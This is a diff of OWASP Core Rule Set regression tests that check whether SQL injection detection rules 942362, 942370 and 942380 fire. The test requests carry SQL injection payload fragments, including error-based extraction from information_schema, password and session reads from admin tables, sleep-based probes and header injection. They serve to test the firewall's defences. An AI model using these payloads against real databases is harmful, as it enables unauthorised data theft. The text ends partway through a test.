dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-29 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-30 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-31 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-32 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942362" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index 28c6d56896..b442913a28 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -1,23 +1,204 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942370.yaml - tests: - - - test_title: 942370-1 - desc: "classic SQL injection probings 2/3" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=\"` * 12344" - version: HTTP/1.0 - output: - log_contains: id "942370" +meta: + author: "Christian S.J. Peron, Max Leske, Franziska Bühler" + description: | + classic SQL injection probings 2/3 + + WARNING: these tests were derived from the existing expressions and are semantically meaningless. + The tests were used to ensure that a change to the assembly file would not change the semantics. + If you know what a particular expression is supposed to catch, please revise the associated test. + enabled: true + name: 942370.yaml +tests: + - test_title: 942370-1 + desc: | + [\"'`]\s*?\*.+or\W*?[\"'`]\d + [\"'`]\s*?\*.+xor\W*?[\"'`]\d + [\"'`]\s*?\*.+div\W*?[\"'`]\d + [\"'`]\s*?\*.+like\W*?[\"'`]\d + [\"'`]\s*?\*.+between\W*?[\"'`]\d + [\"'`]\s*?\*.+and\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-2 + desc: | + [\"'`]\s*?\*.+id\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-3 + desc: | + [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' = # '" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-4 + desc: | + [^\w\s]+\s*?[\W\d].*?# + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-5 + desc: | + [^\w\s]+\s*?[\W\d].*?-- + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='? # = --" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-6 + desc: | + [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?div\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?like\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-7 + desc: | + \^[\"'`] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=^'" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-8 + desc: | + [\"'`].*?\*\s*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-9 + desc: | + [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=>foo##'." + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-10 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-11 + desc: encode(lo_get(16400),'base64')::int + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index 90c6e0dd62..ab7974fb2c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -1,755 +1,772 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942380.yaml - tests: - - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-5 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-20 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-22 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942380.yaml +tests: + - test_title: 942380-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 